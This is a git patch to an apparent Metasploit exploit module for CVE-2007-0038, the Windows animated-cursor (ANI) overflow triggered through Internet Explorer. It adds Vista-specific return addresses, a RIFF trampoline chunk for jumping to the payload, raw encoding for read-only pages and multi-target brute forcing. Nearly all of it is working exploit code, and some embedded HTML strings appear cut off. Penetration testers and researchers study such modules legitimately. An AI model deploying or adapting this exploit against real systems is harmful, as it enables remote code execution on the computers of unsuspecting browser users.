From 6cfab21bcbc75166e33315595ede06e7b5946813 Mon Sep 17 00:00:00 2001 From: Matt Miller Date: Sun, 1 Apr 2007 20:33:35 +0000 Subject: [PATCH] fixes for Vista, brute forcing git-svn-id: file:///home/svn/framework3/trunk@4598 4d416f70-5f16-0410-b530-b9f4589650da --- .../browser/ani_loadimage_chunksize.rb | 85 +++++++++++-------- 1 file changed, 48 insertions(+), 37 deletions(-) diff --git a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb index 5050262024..c2b4f27b97 100644 --- a/modules/exploits/windows/browser/ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ani_loadimage_chunksize.rb @@ -96,18 +96,20 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote # # Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start - # of the RIFF itself. + # of the RIFF chunk itself. The length field of the RIFF chunk + # tag contains a short jump into an embedded riff chunk that + # makes a long relative jump into the actual payload. # - - # The RIFF magic bytes and the size of the riff file are - # executed which then bounce through. - # - # 1. Partial overwrite return with the address of a jmp dword [ebx] - # 2. Executes the first few bytes of the RIFF chunk and then - # does a jmp $+0x16 - # 3. Executes a relative jump to the start of the payload - # itself. - [ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ] + [ 'Windows Vista user32.dll 6.0.6000.16386', + { + 'Ret' => 0x700b, + 'Len' => 2, + + # On Vista, the pages that contain the RIFF are read-only. + # In-place decoders cannot be used. + 'EncoderType' => Msf::Encoder::Type::Raw + } + ] ], 'DisclosureDate' => 'Mar 28 2007', @@ -144,29 +146,15 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote "" + rand_text_alphanumeric(rand(128)+1) mytargs = (target.name =~ /All Targets/) ? targets : [target] - - mytargs.each_index do |i| - - next if not mytargs[i].ret - - html << "
" + - generate_padding() + - "
" + + if target.name =~ /All Targets/ + targets.each_index { |i| + next if not targets[i].ret + + html << generate_div(gext, i) + } + else + html << generate_div(gext, target_index) end html << "" @@ -191,6 +179,27 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote handler(cli) end + def generate_div(gext, targ) + "
" + + generate_padding() + + "
" + end + def generate_ani(payload, target) # Build the first ANI header @@ -208,10 +217,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote if (target.name =~ /Vista/) # Vista has ebp=80, eip=84 - anih_b = anih_a + rand_text(84-anih_a.length) + anih_b = rand_text(84) - # Overwrite locals with invalid pointers - anih_b[68, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3 + # Overwrite local counter variable and pointers + anih_b[68, 12] = [0].pack('V') * 3 else # XP/2K has ebp=76 and eip=80 anih_b = anih_a + rand_text(80-anih_a.length) @@ -226,6 +235,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote # Begin the ANI chunk riff = "ACON" + # Calculate the data offset for the trampoline chunk and add + # the trampoline chunk if we're attacking Vista if target.name =~ /Vista/ trampoline_doffset = riff.length + 8